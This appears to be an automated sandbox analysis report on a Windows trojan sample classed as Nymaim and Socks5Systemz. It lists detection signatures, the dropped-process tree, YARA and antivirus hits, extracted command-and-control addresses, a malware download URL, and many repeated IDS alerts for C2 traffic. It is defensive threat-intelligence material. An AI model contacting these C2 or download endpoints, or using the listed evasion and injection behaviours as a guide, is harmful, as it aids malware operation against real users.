Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1559044
MD5: 5237853dbebaefb1dfa86130dd1d39fa
SHA1: c2a42211c8970e1f10cc13261d5e133739c196f4
SHA256: e185e43f039f7a97672db4a44597abd6d2bf49c08d7bc689318a098ec826bb00
Tags: exe, Socks5Systemz, user-Bitsight
Infos:

Detection

Nymaim, Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Nymaim
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Found API chain indicative of debugger detection
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6508 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5237853DBEBAEFB1DFA86130DD1D39FA)
    • file.exe (PID: 6556 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5237853DBEBAEFB1DFA86130DD1D39FA)
      • NqISs1vOr.exe (PID: 6872 cmdline: "C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe" MD5: 98C5D582966DD7E46FF73E7D6D62B87D)
        • NqISs1vOr.tmp (PID: 6916 cmdline: "C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp" /SL5="$403E6,3817417,54272,C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe" MD5: 62FDBBA6364B54BBE42B437284A2963C)
          • net.exe (PID: 7036 cmdline: "C:\Windows\system32\net.exe" pause alter_game_11196 MD5: 31890A7DE89936F922D44D677F681A7F)
            • conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net1.exe (PID: 980 cmdline: C:\Windows\system32\net1 pause alter_game_11196 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
          • altergame32.exe (PID: 2488 cmdline: "C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe" -i MD5: C1DEEF6663EFF952E8990193B3452A2F)
      • ebAAb6KfuCx7.exe (PID: 3236 cmdline: "C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe" MD5: F328A95046E3A2514C36347EAEC911C0)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Nymaim | Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim
{"C2 list": ["boietuj.com"]}
{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source | Rule | Description | Author | Strings
00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x82d5:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.3048714500.0000000002D95000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
Process Memory Space: altergame32.exe PID: 2488 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.6315a0.1.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |

No Sigma rule has matched

AV Detection

Source: file.exe | Avira: detected
Source: http://185.156.72.65/add?substr=mixeleven&s=three&sub=nosub | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/files/download | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PAB1[1].file | Avira: detection malicious, Label: PUA/Agent.EI
Source: 0.2.file.exe.6315a0.1.raw.unpack | Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source: altergame32.exe.2488.6.memstrmin | Malware Configuration Extractor: Socks5Systemz {"C2 list": ["boietuj.com"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PAB1[1].file | ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe | ReversingLabs: Detection: 54%
Source: file.exe | ReversingLabs: Detection: 36%
Source: file.exe | Virustotal: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\EShineEncoder\EShineEncoder.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp | Code function: 3_2_0045CFA8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,3_2_0045CFA8
Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp | Code function: 3_2_0045D05C ArcFourCrypt,3_2_0045D05C
Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp | Code function: 3_2_0045D074 ArcFourCrypt,3_2_0045D074
Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp | Code function: 3_2_10001000 ISCryptGetVersion,3_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp | Code function: 3_2_10001130 ArcFourCrypt,3_2_10001130

Compliance

Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe | Unpacked PE file: 6.2.altergame32.exe.400000.0.unpack
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlterGame_is1
Source: Binary string: msvcp71.pdbx# source: is-PR9GR.tmp.3.dr
Source: Binary string: msvcr71.pdb< source: is-GSS65.tmp.3.dr
Source: Binary string: msvcp71.pdb source: is-PR9GR.tmp.3.dr
Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-28G11.tmp.3.dr
Source: Binary string: C:\Users\79631\source\repos\Gcleanerapp\Gcleanerapp\obj\Release\Gcleanerapp.pdb source: ebAAb6KfuCx7.exe, 00000008.00000000.1932852369.00000000008F2000.00000002.00000001.01000000.0000000C.sdmp, PAB1[1].file.1.dr, ebAAb6KfuCx7.exe.1.dr
Source: Binary string: msvcr71.pdb source: is-GSS65.tmp.3.dr
Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp | Code function: 3_2_00452A34 FindFirstFileA,GetLastError,3_2_00452A34
Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp | Code function: 3_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,3_2_00474D70
Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp | Code function: 3_2_00462578 FindFirstFileA,FindNextFileA,FindClose,3_2_00462578
Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp | Code function: 3_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,3_2_004975B0
Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp | Code function: 3_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,3_2_00463B04
Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp | Code function: 3_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,3_2_00463F80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404250 SetFileAttributesW,GetCommConfig,EnumCalendarInfoW,GetLogicalDriveStringsA,SetComputerNameA,ChangeTimerQueueTimer,GetTempFileNameW,EnumTimeFormatsA,WriteConsoleInputW,GetVersionExA,InterlockedIncrement,GlobalUnWire,0_2_00404250

Networking

Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49858 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49858 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49892 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49892 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49885 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49885 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49898 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49904 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49898 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49904 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49917 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49917 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49910 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49910 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49927 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49927 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49939 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49939 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49933 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49933 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49945 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49945 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49956 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49956 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49962 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49962 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49968 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49968 -> 185.208.158.202:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49974 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49974 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49980 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49980 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49991 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49991 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49999 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49999 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50011 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50011 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50004 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50004 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50030 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50030 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50028 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50028 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50034 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50034 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50036 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50036 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50040 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50040 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50017 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50035 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50017 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50042 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50031 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50035 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50031 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50042 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50049 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50049 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50029 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50041 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50032 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50029 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50032 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50038 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50047 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50039 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50041 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50051 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50051 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50052 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50038 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50033 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50033 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50039 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50046 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50059 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50047 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50059 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50048 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50023 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50037 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50055 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50048 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50057 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50043 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50057 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50046 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50023 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50055 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50052 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50043 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50044 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50044 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50045 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50045 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50056 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50056 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50054 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50037 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50050 -> 185.208.158.202:80
